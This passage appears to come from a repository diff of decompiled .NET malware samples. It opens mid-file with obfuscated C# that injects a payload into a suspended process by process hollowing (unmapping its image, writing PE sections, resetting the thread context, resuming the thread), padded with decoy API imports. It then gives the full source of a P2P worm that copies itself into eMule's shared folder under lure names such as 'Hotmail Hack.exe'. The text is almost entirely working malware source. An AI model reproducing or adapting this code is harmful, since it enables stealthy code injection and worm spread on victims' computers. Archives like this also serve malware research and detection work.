buffy.EFVI2YI66B efvI2Yi66B1 = buffy.TXXY5U8D2U<buffy.EFVI2YI66B>("ntdll", "ZwUnmapViewOfSection");
buffy.W6CTR6GLCC w6CtR6Glcc1 = buffy.TXXY5U8D2U<buffy.W6CTR6GLCC>("kernel32", "VirtualAllocEx");
buffy.K7B3INYH01 k7B3InyH01_1 = buffy.TXXY5U8D2U<buffy.K7B3INYH01>("kernel32", "SetThreadContext");
buffy.WS2XVBNVO9 ws2XvbnvO9_1 = buffy.TXXY5U8D2U<buffy.WS2XVBNVO9>("kernel32", "ResumeThread");
buffy.GN04L0ER8I gn04L0Er8I2 = gn04L0Er8I1;
string DASDAS3E2_1 = VVVVVVCAE;
object obj6 = obj3;
buffy.Security_Flags securityFlags1;
buffy.Security_Flags securityFlags2 = obj6 != null ? (buffy.Security_Flags) obj6 : securityFlags1;
ref buffy.Security_Flags local1 = ref securityFlags2;
object obj7 = obj4;
buffy.Security_Flags securityFlags3 = obj7 != null ? (buffy.Security_Flags) obj7 : securityFlags1;
ref buffy.Security_Flags local2 = ref securityFlags3;
IntPtr num1;
IntPtr DSA43R3W1 = num1;
object obj8 = obj2;
buffy.Startup_Information startupInformation1;
buffy.Startup_Information startupInformation2 = obj8 != null ? (buffy.Startup_Information) obj8 : startupInformation1;
ref buffy.Startup_Information local3 = ref startupInformation2;
object obj9 = obj1;
buffy.Process_Information processInformation1;
buffy.Process_Information processInformation2 = obj9 != null ? (buffy.Process_Information) obj9 : processInformation1;
ref buffy.Process_Information local4 = ref processInformation2;
int num2 = gn04L0Er8I2((string) null, DASDAS3E2_1, ref local1, ref local2, false, 4U, DSA43R3W1, (string) null, ref local3, out local4) ? 1 : 0;
object obj10 = (object) processInformation2;
object Instance4 = (object) startupInformation2;
object obj11 = (object) securityFlags3;
object obj12 = (object) securityFlags2;
if (-((uint) num2 > 0U ? 1 : 0) == 0)
return;
buffy.NT_Headers ntHeaders1 = new buffy.NT_Headers();
IntPtr ptr = new IntPtr(checked (integer1 + dosHeader3.DASE3ASDAS));
object structure1 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType());
buffy.NT_Headers ntHeaders2;
buffy.NT_Headers ntHeaders3 = structure1 != null ? (buffy.NT_Headers) structure1 : ntHeaders2;
NewLateBinding.LateSet(Instance4, (Type) null, "CSZE", new object[1]
{
(object) Strings.Len(RuntimeHelpers.GetObjectValue(Instance4))
}, (string[]) null, (Type[]) null);
NewLateBinding.LateSet(Instance1, (Type) null, "II69TOHMUR", new object[1]
{
(object) 65539
}, (string[]) null, (Type[]) null);
if (ntHeaders3.SSSSSSSSSSSQ != 17744U | dosHeader3.DASDASFASF != (ushort) 23117)
return;
buffy.GN04L0ER8I gn04L0Er8I3 = gn04L0Er8I1;
string DASDAS3E2_2 = VVVVVVCAE;
object obj13 = obj12;
securityFlags2 = obj13 != null ? (buffy.Security_Flags) obj13 : securityFlags1;
ref buffy.Security_Flags local5 = ref securityFlags2;
object obj14 = obj11;
securityFlags3 = obj14 != null ? (buffy.Security_Flags) obj14 : securityFlags1;
ref buffy.Security_Flags local6 = ref securityFlags3;
IntPtr DSA43R3W2 = num1;
object obj15 = Instance4;
startupInformation2 = obj15 != null ? (buffy.Startup_Information) obj15 : startupInformation1;
ref buffy.Startup_Information local7 = ref startupInformation2;
object obj16 = obj10;
processInformation2 = obj16 != null ? (buffy.Process_Information) obj16 : processInformation1;
ref buffy.Process_Information local8 = ref processInformation2;
int num3 = gn04L0Er8I3((string) null, DASDAS3E2_2, ref local5, ref local6, false, 4U, DSA43R3W2, (string) null, ref local7, out local8) ? 1 : 0;
object Instance5 = (object) processInformation2;
object obj17 = (object) startupInformation2;
object obj18 = (object) securityFlags3;
object obj19 = (object) securityFlags2;
if (-((uint) num3 > 0U ? 1 : 0) == 0)
return;
buffy.R84OY4NT36 r84Oy4Nt36_2 = r84Oy4Nt36_1;
object obj20 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASDASC = obj20 != null ? (IntPtr) obj20 : num1;
object obj21 = Instance1;
buffy.Context context1;
buffy.Context context2 = obj21 != null ? (buffy.Context) obj21 : context1;
ref buffy.Context local9 = ref context2;
int num4 = r84Oy4Nt36_2(DASDASC, ref local9) ? 1 : 0;
object Instance6 = (object) context2;
buffy.Q7QRRP639W q7QrrP639W2 = q7QrrP639W1;
object obj22 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr FASFDASDAS = obj22 != null ? (IntPtr) obj22 : num1;
int integer2 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
long num5;
int num6 = checked ((int) num5);
ref int local10 = ref num6;
int num7 = 0;
ref int local11 = ref num7;
int num8 = q7QrrP639W2(FASFDASDAS, integer2, ref local10, 4, ref local11);
long num9 = (long) num6;
buffy.EFVI2YI66B efvI2Yi66B2 = efvI2Yi66B1;
object obj23 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE3 = obj23 != null ? (IntPtr) obj23 : num1;
int AL8ZCRFWNU1 = checked ((int) num9);
long num10 = efvI2Yi66B2(DASE3, AL8ZCRFWNU1);
buffy.W6CTR6GLCC w6CtR6Glcc2 = w6CtR6Glcc1;
object obj24 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE43E = obj24 != null ? (IntPtr) obj24 : num1;
int dfazdasd = checked ((int) ntHeaders3.OOOU.DFAZDASD);
int dasrdasrasr = (int) ntHeaders3.OOOU.DASRDASRASR;
uint num11 = checked ((uint) (int) w6CtR6Glcc2(DASE43E, dfazdasd, (uint) dasrdasrasr, 12288U, 4U));
if (num11 == 0U)
return;
buffy.ZGOQ8VM05M zgoQ8Vm05M2 = zgoQ8Vm05M1;
object obj25 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_1 = obj25 != null ? (IntPtr) obj25 : num1;
int AL8ZCRFWNU2 = checked ((int) num11);
byte[] DSAE32_1 = DAS4DA3;
int wqdasdasd = checked ((int) ntHeaders3.OOOU.WQDASDASD);
uint num12;
int num13 = checked ((int) num12);
ref int local12 = ref num13;
int num14 = zgoQ8Vm05M2(DASE32_1, AL8ZCRFWNU2, DSAE32_1, wqdasdasd, out local12) ? 1 : 0;
uint num15 = checked ((uint) num13);
long num16 = (long) checked (dosHeader3.DASE3ASDAS + 248);
int num17 = checked ((int) ntHeaders3.DSEEEEE.DAAAAAAAA3 - 1);
int num18 = 0;
while (num18 <= num17)
{
ptr = new IntPtr(checked ((long) integer1 + num16 + (long) (num18 * 40)));
buffy.Section_Header sectionHeader1;
object structure2 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType());
buffy.Section_Header sectionHeader2;
sectionHeader1 = structure2 != null ? (buffy.Section_Header) structure2 : sectionHeader2;
byte[] numArray = new byte[checked ((int) sectionHeader1.DA22S3 + 1)];
int num19 = checked ((int) ((long) sectionHeader1.DA22S3 - 1L));
int index = 0;
while (index <= num19)
{
numArray[index] = DAS4DA3[checked ((int) ((long) sectionHeader1.PoinEEter + (long) index))];
checked { ++index; }
}
buffy.ZGOQ8VM05M zgoQ8Vm05M3 = zgoQ8Vm05M1;
object obj26 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_2 = obj26 != null ? (IntPtr) obj26 : num1;
int AL8ZCRFWNU3 = checked ((int) (num11 + sectionHeader1.AL8ZCRFWNU));
byte[] DSAE32_2 = numArray;
int da22S3 = checked ((int) sectionHeader1.DA22S3);
int num20 = checked ((int) num15);
ref int local13 = ref num20;
int num21 = zgoQ8Vm05M3(DASE32_2, AL8ZCRFWNU3, DSAE32_2, da22S3, out local13) ? 1 : 0;
num15 = checked ((uint) num20);
checked { ++num18; }
}
object bytes = (object) BitConverter.GetBytes(num11);
buffy.ZGOQ8VM05M zgoQ8Vm05M4 = zgoQ8Vm05M1;
object obj27 = NewLateBinding.LateGet(Instance5, (Type) null, "DAS4QQW", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASE32_3 = obj27 != null ? (IntPtr) obj27 : num1;
int integer3 = Conversions.ToInteger(Operators.AddObject(NewLateBinding.LateGet(Instance6, (Type) null, "WDA", new object[0], (string[]) null, (Type[]) null, (bool[]) null), (object) 8));
byte[] DSAE32_3 = (byte[]) bytes;
int num22 = checked ((int) num15);
ref int local14 = ref num22;
int num23 = zgoQ8Vm05M4(DASE32_3, integer3, DSAE32_3, 4, out local14) ? 1 : 0;
num12 = checked ((uint) num22);
NewLateBinding.LateSet(Instance6, (Type) null, "AS4", new object[1]
{
(object) checked (num11 + ntHeaders3.OOOU.DDDDDDDDAAA)
}, (string[]) null, (Type[]) null);
buffy.K7B3INYH01 k7B3InyH01_2 = k7B3InyH01_1;
object obj28 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr ASDASCASDASD = obj28 != null ? (IntPtr) obj28 : num1;
object obj29 = Instance6;
context2 = obj29 != null ? (buffy.Context) obj29 : context1;
ref buffy.Context local15 = ref context2;
int num24 = k7B3InyH01_2(ASDASCASDASD, ref local15) ? 1 : 0;
object obj30 = (object) context2;
buffy.WS2XVBNVO9 ws2XvbnvO9_2 = ws2XvbnvO9_1;
object obj31 = NewLateBinding.LateGet(Instance5, (Type) null, "RFSER", new object[0], (string[]) null, (Type[]) null, (bool[]) null);
IntPtr DASEAS = obj31 != null ? (IntPtr) obj31 : num1;
int num25 = (int) ws2XvbnvO9_2(DASEAS);
}
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string tr6);
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr gdr54, [MarshalAs(UnmanagedType.VBByRefStr)] ref string gfsd54);
[DllImport("rpcns4.dll", EntryPoint = "RpcNsProfileEltAddA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RpcNsProfileEltAdd(
long ProfileNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string ProfileName,
ref IntPtr IfId,
long MemberNameSyntax,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string MemberName,
long Priority,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Annotation);
[DllImport("wldap32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ldap_close_extended_op(ref IntPtr ld, long MessageNumber);
[DllImport("tapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long lineSetAppSpecific(long hCall, long dwAppSpecific);
[DllImport("rtm.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MgmGetNextMfeStats(
ref IntPtr pimmStart,
ref long pdwBufferSize,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string pbBuffer,
ref long pdwNumEntries);
[DllImport("mprapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MprAdminDeviceEnum(
ref IntPtr hMprServer,
long dwLevel,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lplpbBuffer,
ref long lpdwTotalEntries);
[DllImport("MSI.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long MsiDatabaseImport(
ref IntPtr hDatabase,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFolderPath,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string szFileName);
[DllImport("rpcrt4.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NdrMesSimpleTypeAlignSize(long handle_t);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetMessageNameDel([MarshalAs(UnmanagedType.VBByRefStr)] ref string servername, [MarshalAs(UnmanagedType.VBByRefStr)] ref string msgname);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetReplExportDirSetInfo(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string servername,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string dirname,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string buf,
ref long parm_err);
[DllImport("NETAPI32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long NetUseGetInfo(
ref IntPtr UncServerName,
ref IntPtr UseName,
long level,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string bufptr);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long QueueUserWorkItem(long lFunction, ref long Context, long Flags);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleInputA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsoleInput(
long hConsoleInput,
ref IntPtr lpBuffer,
long nLength,
ref long lpNumberOfEventsRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ShowWindowAsync(long hWnd, long nCmdShow);
[DllImport("mgmtapi.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SnmpMgrCtl(
ref IntPtr session,
long dwCtlCode,
ref long lpvInBuffer,
long cbInBuffer,
ref long lpvOUTBuffer,
long cbOUTBuffer,
ref long lpcbBytesReturned);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long AddAuditAccessAceEx(
IntPtr pAcl,
long dwAceRevision,
long AceFlags,
long dwAccessMask,
ref IntPtr pSid,
long bAuditSuccess,
long bAuditFailure);
[DllImport("ODBCCP32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLInstallerError(
int iError,
ref long pfErrorCode,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszErrorMsg,
int cbErrorMsgMax,
ref int pcbErrorMsg);
[DllImport("msorcl32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SQLSetCursorName(long hstmt, [MarshalAs(UnmanagedType.VBByRefStr)] ref string szCursor, int cbCursor);
[DllImport("rasapi32.dll", EntryPoint = "RasSetCredentialsA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RasSetCredentials(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpcstr,
ref IntPtr TLPRASCREDENTIALSA,
long @bool);
[DllImport("kernel32.dll", EntryPoint = "ReadConsoleA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadConsole(
long hConsoleInput,
ref long lpBuffer,
long nNumberOfCharsToRead,
ref long lpNumberOfCharsRead,
ref long lpReserved);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadEncryptedFileRaw(
ref IntPtr pfExportCallback,
ref long pvCallbackContext,
ref long pvContext);
[DllImport("winspool.drv", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReadPrinter(
long hPrinter,
ref long pBuf,
long cdBuf,
ref long pNoBytesRead);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long RegisterHotKey(long hwnd, long id, long fsModifiers, long vk);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long ReleaseSemaphore(
long hSemaphore,
long lReleaseCount,
ref long lpPreviousCount);
[DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr GetSiteNameFromSid(ref long pSid, [MarshalAs(UnmanagedType.VBByRefStr)] ref string pwsSite);
[DllImport("kernel32.dll", EntryPoint = "GetStringTypeExA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetStringTypeEx(
long Locale,
long dwInfoType,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpSrcStr,
long cchSrc,
ref int lpCharType);
[DllImport("kernel32.dll", EntryPoint = "GetVolumePathNameA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long GetVolumePathName(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszFileName,
[MarshalAs(UnmanagedType.VBByRefStr)] ref string lpszVolumePathName,
long cchBufferLength);
[DllImport("user32.dll", EntryPoint = "SetWindowLongA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long SetWindowLong(long hwnd, long nIndex, long dwNewLong);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long TlsSetValue(long dwTlsIndex, ref long lpTlsValue);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr ToAscii(
long uVirtKey,
long uScanCode,
ref byte lpbKeyState,
ref long lpwTransKey,
long fuState);
private static T TXXY5U8D2U<T>(string ASFASE3, string FASGAS543W) => (T) Marshal.GetDelegateForFunctionPointer(buffy.GetProcAddress(buffy.LoadLibraryA(ref ASFASE3), ref FASGAS543W), typeof (T));
public struct Context
{
public uint II69TOHMUR;
public uint d2;
public uint das;
public uint d9;
public uint ad;
public uint dsa;
public uint ds;
public buffy.Save Save;
public uint dh;
public uint sad;
public uint da;
public uint MD;
public uint RD;
public uint mSI;
public uint WDA;
public uint AD3;
public uint D21;
public uint AS4;
public uint K32;
public uint F2W;
public uint HHJ;
public uint ADF5;
public uint GSSA;
public uint DSAAA;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] er6rgdr65;
}
public struct Save
{
public uint KD7JX2MXT;
public uint JCNS3ZPSXO;
public uint DAS3;
public uint DAS23;
public uint ADSA;
public uint DAF35;
public uint FA32D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] FSDRF43;
public uint FA32QA;
}
public struct Misc
{
public uint SDUHRL;
public uint GSIJ;
}
public struct Section_Header
{
public byte FSDPOU4PO3;
public buffy.Misc Mi2sc;
public uint AL8ZCRFWNU;
public uint DA22S3;
public uint PoinEEter;
public uint E2Q4RS;
public uint FS523QF;
public uint FSB43FSD4;
public uint QBFAS4E;
public uint AS32QFZS;
}
public struct Process_Information
{
public IntPtr DAS4QQW;
public IntPtr RFSER;
public int TGJWE;
public int SDFFFFFFFFFF;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct Startup_Information
{
public int CSZE;
public string FSDR4G;
public string AAAAAAAAAA;
public string AADDDDDDD;
public int ADA;
public int C;
public int AEDS;
public int DASDDDD;
public int XASE4;
public int DAS3EDFZ;
public int DVA3ES;
public int CCCCQ;
public short FDSRS;
public short VYE5X;
public int KHJKIHJK;
public int KHJKHJK;
public int KHJKHJ;
public int KHJKJHK;
}
public struct Security_Flags
{
public int GFSETWE;
public IntPtr EWEWWW;
public int DASDAS;
}
public struct DOS_Header
{
public ushort DASDASFASF;
public ushort QWEQWE;
public ushort EQWEQWEQWE;
public ushort HFGHFGHFGH;
public ushort HFGHFGHFG;
public ushort DASD444444;
public ushort DASFASE33;
public ushort DASKGHJ;
public ushort DASVZDF;
public ushort VXCVXC;
public ushort VXCVXCV;
public ushort EWECS;
public ushort EWADC;
public ushort UADA3;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] ReservWWWWWWWWWWWWWWWedA;
public ushort DAS4E;
public ushort UJJ;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] DDDDDDDDD;
public int DASE3ASDAS;
}
public struct NT_Headers
{
public uint SSSSSSSSSSSQ;
public buffy.File_Header DSEEEEE;
public buffy.Optional_Headers OOOU;
}
public struct File_Header
{
public ushort ITTTTTTTT;
public ushort DAAAAAAAA3;
public uint HRFTYTYTR;
public uint GJGFSFS;
public uint FSVGY;
public ushort FSFV;
public ushort A34FFC;
}
public struct Optional_Headers
{
public ushort WWWWWWWWW;
public byte MaAAAAAAAAAAAjor;
public byte MiSSSSSSSSSSSnor;
public uint SSSSSSSSSSSSS;
public uint FFFFFFFFFFF;
public uint XXXXXXXX;
public uint DDDDDDDDAAA;
public uint FSSSSSSS;
public uint RSFS43;
public uint DFAZDASD;
public uint SectionA;
public uint FileA;
public ushort GDFTDFFFF;
public ushort HGDFHD564;
public ushort GD5ERGD;
public ushort FSD5YHD;
public ushort ASDASG;
public ushort AS4ASAS;
public uint CCC;
public uint DASRDASRASR;
public uint WQDASDASD;
public uint Assssssss;
public ushort fsd4s;
public ushort fjio;
public uint dasrlajstpoi;
public uint dasdraskyjhuasp;
public uint SHRedas4wa9uqserve;
public uint fsdtsysyt;
public uint eawdasdas3;
public uint Cocccunt;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public buffy.Data_Directory[] GSDGSDT4;
}
public struct Data_Directory
{
public uint ewq34q234;
public uint das34aw33;
}
public delegate bool GN04L0ER8I(
string ASFASE3,
string DASDAS3E2,
ref buffy.Security_Flags DASCASE,
ref buffy.Security_Flags CASE222,
bool DAS432E,
uint AEDFKJK32,
IntPtr DSA43R3W,
string ase32ew,
[In] ref buffy.Startup_Information das43fsa,
out buffy.Process_Information das3);
public delegate bool ZGOQ8VM05M(
IntPtr DASE32,
int AL8ZCRFWNU,
byte[] DSAE32,
int DASEADAS,
out int ASD43FA);
public delegate int Q7QRRP639W(
IntPtr FASFDASDAS,
int AL8ZCRFWNU,
ref int CAS32,
int ASDASC,
ref int CASTWE);
public delegate IntPtr W6CTR6GLCC(
IntPtr DASE43E,
int AL8ZCRFWNU,
uint DASCAS3,
uint DAS3,
uint DAS32);
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
}
MSIL/P2P-Worm/Win32/P/P2P-Worm.Win32.Palevo.brve-9b61103439b8a1658e33fb5703e4aadf6efdfa53a324dd37c2154a483860cf80/pizde.cs
+639
View File
File diff suppressed because one or more lines are too long
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyVersion("1.0.1397.42263")]
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/Form1.cs
+42
View File
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: WindowsApplication1.Form1
// Assembly: WindowsApplication1, Version=1.0.1397.42263, Culture=neutral, PublicKeyToken=null
// MVID: AFD50EA1-B36A-4E16-9DBC-77E7D8FDC9A1
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6.exe
using System;
using System.IO;
using System.Windows.Forms;
namespace WindowsApplication1
{
public class Form1 : Form
{
[STAThread]
private static void Main()
{
string destFileName1 = "C:\\Program Files\\eMule\\Incoming\\Teen Sex.exe";
if (Application.ExecutablePath != destFileName1)
File.Copy(Application.ExecutablePath, destFileName1, true);
string destFileName2 = "C:\\Program Files\\eMule\\Incoming\\AVP Crack.exe";
if (Application.ExecutablePath != destFileName2)
File.Copy(Application.ExecutablePath, destFileName2, true);
string destFileName3 = "C:\\Program Files\\eMule\\Incoming\\Panda Antivirus Crack.exe";
if (Application.ExecutablePath != destFileName3)
File.Copy(Application.ExecutablePath, destFileName3, true);
string destFileName4 = "C:\\Program Files\\eMule\\Incoming\\Hotmail Hack.exe";
if (Application.ExecutablePath != destFileName4)
File.Copy(Application.ExecutablePath, destFileName4, true);
string destFileName5 = "C:\\Program Files\\eMule\\Incoming\\Yahoo Hack.exe";
if (Application.ExecutablePath != destFileName5)
File.Copy(Application.ExecutablePath, destFileName5, true);
string destFileName6 = "C:\\Program Files\\eMule\\Incoming\\Commandos 3 Crack.exe";
if (Application.ExecutablePath != destFileName6)
File.Copy(Application.ExecutablePath, destFileName6, true);
string destFileName7 = "C:\\Program Files\\eMule\\Incoming\\Zone Alarm Pro Crack.exe";
if (!(Application.ExecutablePath != destFileName7))
return;
File.Copy(Application.ExecutablePath, destFileName7, true);
}
}
}
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/Form1.resx
+123
View File
@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BUZvcm0x</value>
</data>
</root>
MSIL/P2P-Worm/Win32/S/P2P-Worm.Win32.Secorm-66106dc8b8fbe05f679ce87d7a4bae2d1661e4c1dc62f380accd3cbeaaed1ad6/P2P-Worm.Win32.Secorm.csproj
+43
View File
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
